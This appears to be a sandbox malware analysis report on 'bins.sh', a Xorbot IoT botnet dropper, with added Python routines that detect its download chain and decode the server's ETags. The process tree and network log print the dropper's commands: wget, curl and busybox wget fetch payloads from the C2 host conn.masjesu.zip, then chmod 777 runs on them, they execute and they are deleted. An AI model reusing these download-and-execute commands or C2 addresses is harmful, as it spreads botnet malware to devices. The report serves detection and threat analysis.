Analysis

  • max time kernel
    138s
  • max time network
    147s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240418-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    2025-01-05, 16:50 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    e4f7c4a0fc9b3693b98dd8a72fd33c6c

  • SHA1

    02b5a992865ee73db4aa7f47d76847017ed9bef8

  • SHA256

    c063bdd7c8bb3a71082fd8295be7980b06d75b9fea1efbd02684a2a4dff87397

  • SHA512

    033e72887a61c5b6f214acdd88d420cabe9b673b8f239ac5093c17d861c313167840c19e65b07bdb6b69b9a25e1cc58d577e76d6dc4e4f3d2df38ec298ff473d

  • SSDEEP

    96:Yj/p8AKhThvhQDDcwLk/kTkvm+qLfrnf/fyJptLCalhvhDhm3v6qi3EIuMZ7XeU1:w1zr3yJptWTc8QbWGvSr3yJpX8QbWGd

Malware Config

Signatures

  • Detects Xorbot 2 IoCs
  • Xorbot

    Xorbot is a Linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:729
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:733
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:756
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:759
        • /bin/chmod
          chmod 777 fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • File and Directory Permissions Modification
          PID:760
        • /tmp/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          ./fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
          • Executes dropped EXE
          PID:761
        • /bin/rm
          rm fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          2⤵
            PID:763
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:764
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:843
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
            2⤵
            • System Network Configuration Discovery
            PID:845
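
The process tree above is the standard IoT dropper lifecycle: fetch a payload with whichever downloader exists on the box (wget, curl, busybox wget), chmod it executable, run it, delete it, then move on to the next architecture's binary. The following detection routine is an added example and is not part of the tria.ge report; it reconstructs that chain from a process log and reports how far each payload got. EVENTS is a constructed log built by hand from the commands in the tree, and the record layout (pid, ppid, cwd, cmdline) is an assumed log format rather than tria.ge's own. It assumes the fetched file keeps the URL's basename, which holds for plain wget, curl -O and busybox wget as used here.

```python
"""Flag the fetch -> chmod -> execute -> delete dropper chain in a process log.

Added example; not part of the tria.ge report. EVENTS is constructed by hand
from the commands in the Processes section; the field names (pid, ppid, cwd,
cmdline) are an assumed log format.
"""
import shlex
from collections import defaultdict
from urllib.parse import urlparse

C2 = "http://conn.masjesu.zip/bins/"
EVENTS = [  # constructed from the report's process tree
    {"pid": 729, "ppid": 1,   "cwd": "/tmp", "cmdline": "/tmp/bins.sh"},
    {"pid": 733, "ppid": 729, "cwd": "/tmp", "cmdline": "/bin/rm bins.sh"},
    {"pid": 738, "ppid": 729, "cwd": "/tmp", "cmdline": "wget " + C2 + "fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 756, "ppid": 729, "cwd": "/tmp", "cmdline": "curl -O " + C2 + "fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 759, "ppid": 729, "cwd": "/tmp", "cmdline": "/bin/busybox wget " + C2 + "fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 760, "ppid": 729, "cwd": "/tmp", "cmdline": "chmod 777 fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 761, "ppid": 729, "cwd": "/tmp", "cmdline": "./fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 763, "ppid": 729, "cwd": "/tmp", "cmdline": "rm fp1TM7xkHleA56PawZ0JH51VscniTO4kvD"},
    {"pid": 764, "ppid": 729, "cwd": "/tmp", "cmdline": "wget " + C2 + "iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv"},
    {"pid": 843, "ppid": 729, "cwd": "/tmp", "cmdline": "curl -O " + C2 + "iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv"},
    {"pid": 845, "ppid": 729, "cwd": "/tmp", "cmdline": "/bin/busybox wget " + C2 + "iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv"},
]

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}


def _argv(cmdline):
    """Tokenise a command line, unwrap 'busybox <applet>' and strip the
    directory from argv[0] so '/usr/bin/wget', 'wget' and './x' compare by name."""
    argv = shlex.split(cmdline)
    if len(argv) > 1 and argv[0].rsplit("/", 1)[-1] == "busybox":
        argv = argv[1:]
    return [argv[0].rsplit("/", 1)[-1]] + argv[1:] if argv else []


def _grants_exec(mode):
    """True for chmod modes that set an execute bit: numeric modes with an odd
    digit in the last three places (777, 755, 0711) or symbolic '+x' / '+rwx'."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]


def find_dropper_chains(events):
    """Return one finding per fetched payload, with the furthest stage reached
    (fetched -> staged -> executed) and the IoCs tied to it."""
    state = defaultdict(lambda: {"urls": [], "chmod": False, "exec": False,
                                 "removed": False, "parent": None})
    for ev in events:
        argv = _argv(ev["cmdline"])
        if not argv:
            continue
        tool, args = argv[0], argv[1:]
        if tool in DOWNLOADERS:
            for url in args:
                if url.startswith(("http://", "https://", "ftp://", "tftp://")):
                    name = urlparse(url).path.rsplit("/", 1)[-1]  # assumed: file keeps URL basename
                    state[name]["urls"].append(url)
                    state[name]["parent"] = ev["ppid"]
        elif tool == "chmod" and len(args) >= 2 and _grants_exec(args[0]):
            for path in args[1:]:
                state[path.rsplit("/", 1)[-1]]["chmod"] = True
        elif tool == "rm":
            for path in args:
                if not path.startswith("-"):
                    state[path.rsplit("/", 1)[-1]]["removed"] = True
        elif tool in state and state[tool]["urls"] and ev["ppid"] == state[tool]["parent"]:
            state[tool]["exec"] = True  # the fetched file is run by the same parent script
    findings = []
    for name, st in state.items():
        if not st["urls"]:
            continue
        stage = "executed" if st["exec"] else "staged" if st["chmod"] else "fetched"
        findings.append({
            "payload": name,
            "stage": stage,
            "urls": sorted(set(st["urls"])),
            "hosts": sorted({urlparse(u).hostname for u in st["urls"]}),
            "removed": st["removed"],
        })
    return findings


if __name__ == "__main__":
    for f in find_dropper_chains(EVENTS):
        print(f["stage"], f["payload"], f["hosts"], "removed" if f["removed"] else "")
```

Run against the constructed log, the first payload reaches "executed" and is then removed, while the second is only "fetched": the trace ends after the three download attempts, which matches the analysis time limit. Matching on the parent pid is what keeps an unrelated `chmod 777` or `rm` elsewhere on the host from completing somebody else's chain.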

        Network

        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          User-Agent: Wget/1.18 (linux-gnu)
          Accept: */*
          Accept-Encoding: identity
          Host: conn.masjesu.zip
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:33 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: curl/7.52.1
          Accept: */*
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:34 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: Wget
          Connection: close
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:50:35 GMT
          Content-Type: application/octet-stream
          Content-Length: 101654
          Connection: close
          Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
          ETag: "677aac81-18d16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          146.19.162.73
          conn.masjesu.zip
          IN A
          66.63.187.225
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv HTTP/1.1
          User-Agent: Wget/1.18 (linux-gnu)
          Accept: */*
          Accept-Encoding: identity
          Host: conn.masjesu.zip
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:52:48 GMT
          Content-Type: application/octet-stream
          Content-Length: 101142
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:02 GMT
          ETag: "677aac82-18b16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
          conn.masjesu.zip
          IN A
          66.63.187.225
          conn.masjesu.zip
          IN A
          146.19.162.73
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
        • flag-us
          GET
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          Remote address:
          66.63.187.225:80
          Request
          GET /bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv HTTP/1.1
          Host: conn.masjesu.zip
          User-Agent: curl/7.52.1
          Accept: */*
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Sun, 05 Jan 2025 16:52:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 101142
          Connection: keep-alive
          Last-Modified: Sun, 05 Jan 2025 16:00:02 GMT
          ETag: "677aac82-18b16"
          X-Cache-Status: HIT
          Accept-Ranges: bytes
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN A
          Response
        • flag-us
          DNS
          conn.masjesu.zip
          Remote address:
          1.1.1.1:53
          Request
          conn.masjesu.zip
          IN AAAA
          Response
          conn.masjesu.zip
          IN A
          146.19.162.73
          conn.masjesu.zip
          IN A
          66.63.187.225
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          2.8kB
          106.1kB
          51
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          2.8kB
          106.1kB
          52
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD
          http
          1.2kB
          42.0kB
          22
          32

          HTTP Request

          GET http://conn.masjesu.zip/bins/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          HTTP Response

          200
        • 146.19.162.73:80
          conn.masjesu.zip
          420 B
          7
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          http
          2.6kB
          105.5kB
          47
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv

          HTTP Response

          200
        • 66.63.187.225:80
          http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv
          http
          2.9kB
          105.5kB
          53
          79

          HTTP Request

          GET http://conn.masjesu.zip/bins/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv

          HTTP Response

          200
        • 146.19.162.73:80
          conn.masjesu.zip
          240 B
          4
        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          146.19.162.73
          66.63.187.225

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          66.63.187.225
          146.19.162.73

        • 1.1.1.1:53
          conn.masjesu.zip
          dns
          124 B
          219 B
          2
          2

          DNS Request

          conn.masjesu.zip

          DNS Request

          conn.masjesu.zip

          DNS Response

          146.19.162.73
          66.63.187.225
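
The three fetches of each payload differ only in User-Agent (Wget/1.18, curl/7.52.1, and busybox's bare "Wget"), and the server answers every one with the same Content-Length, Last-Modified and ETag. Stock nginx builds its ETag as the file's modification time and size, both in hex, so the tag can be decoded and cross-checked against the other headers, and compared with the Date header it says how long the binary had been staged before this sandbox pulled it. The check below is an added example, not part of the tria.ge report; the two response heads are copied from the Network section above, and the decoding assumes nginx's default ETag format (other servers encode ETags differently, so decode_nginx_etag raises on anything that is not hex-dash-hex).

```python
"""Cross-check the C2's nginx ETags against Content-Length and Last-Modified.

Added example, not part of the tria.ge report. Stock nginx forms its ETag as
"<mtime hex>-<size hex>" from the served file, so a decoded tag should agree
with Last-Modified and Content-Length, and the gap to the Date header is how
long the payload sat on the server before this fetch. RESPONSES is copied
from the report's Network section.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

RESPONSES = {
    "fp1TM7xkHleA56PawZ0JH51VscniTO4kvD": """\
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 05 Jan 2025 16:50:33 GMT
Content-Type: application/octet-stream
Content-Length: 101654
Connection: keep-alive
Last-Modified: Sun, 05 Jan 2025 16:00:01 GMT
ETag: "677aac81-18d16"
X-Cache-Status: HIT
Accept-Ranges: bytes""",
    "iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv": """\
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 05 Jan 2025 16:52:48 GMT
Content-Type: application/octet-stream
Content-Length: 101142
Connection: keep-alive
Last-Modified: Sun, 05 Jan 2025 16:00:02 GMT
ETag: "677aac82-18b16"
X-Cache-Status: HIT
Accept-Ranges: bytes""",
}


def parse_headers(raw):
    """Split a raw response head into (status line, {lower-cased name: value})."""
    status, *lines = raw.splitlines()
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def decode_nginx_etag(etag):
    """'"677aac81-18d16"' -> (mtime as aware UTC datetime, size in bytes).
    Accepts weak tags (W/"...") and raises ValueError for non-nginx formats."""
    tag = etag.strip()
    if tag.startswith("W/"):
        tag = tag[2:]
    tag = tag.strip('"')
    mtime_hex, sep, size_hex = tag.partition("-")
    if not sep:
        raise ValueError("not an nginx-style ETag: %r" % etag)
    mtime = datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc)
    return mtime, int(size_hex, 16)


def check_response(raw):
    """Decode the ETag and report whether it agrees with the other headers and
    how many seconds before the fetch the file was last written on the server."""
    _, h = parse_headers(raw)
    mtime, size = decode_nginx_etag(h["etag"])
    last_modified = parsedate_to_datetime(h["last-modified"])
    served_at = parsedate_to_datetime(h["date"])
    return {
        "etag_size": size,
        "size_matches": size == int(h["content-length"]),
        "etag_mtime": mtime,
        "mtime_matches": mtime == last_modified,
        "staged_seconds_before_fetch": int((served_at - mtime).total_seconds()),
    }


if __name__ == "__main__":
    for name, raw in RESPONSES.items():
        r = check_response(raw)
        print(name, r["etag_size"], r["etag_mtime"].isoformat(),
              "consistent" if r["size_matches"] and r["mtime_matches"] else "MISMATCH",
              "staged %ds before fetch" % r["staged_seconds_before_fetch"])
```

Both tags decode cleanly: 0x18d16 and 0x18b16 are the 101654 and 101142 bytes in Content-Length (the 99KB and 98KB shown under Downloads), and 0x677aac81 and 0x677aac82 are 16:00:01 and 16:00:02 UTC on 5 January 2025, one second apart, so the whole set of binaries was written to the server in a single batch about fifty minutes before this submission. A mismatch between the tag and the headers would point at a reverse proxy or a server that is not what the Server header claims.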

        MITRE ATT&CK Enterprise v15

        Downloads

        • /tmp/fp1TM7xkHleA56PawZ0JH51VscniTO4kvD

          Filesize

          99KB

          MD5

          9438d9bc392bcf300a5583b6df5bc8f6

          SHA1

          375a6ae34b516f6f3eeea8030c4084f585017efa

          SHA256

          68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

          SHA512

          1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

        • /tmp/iUlA7dxNS7acZIL26D0w5R1b7giKezKQDv

          Filesize

          98KB

          MD5

          5141342d0df8699fa32a6b066a0c592e

          SHA1

          8157673225bd5182f16215e2aa823a25ca2d4fbc

          SHA256

          54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

          SHA512

          d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801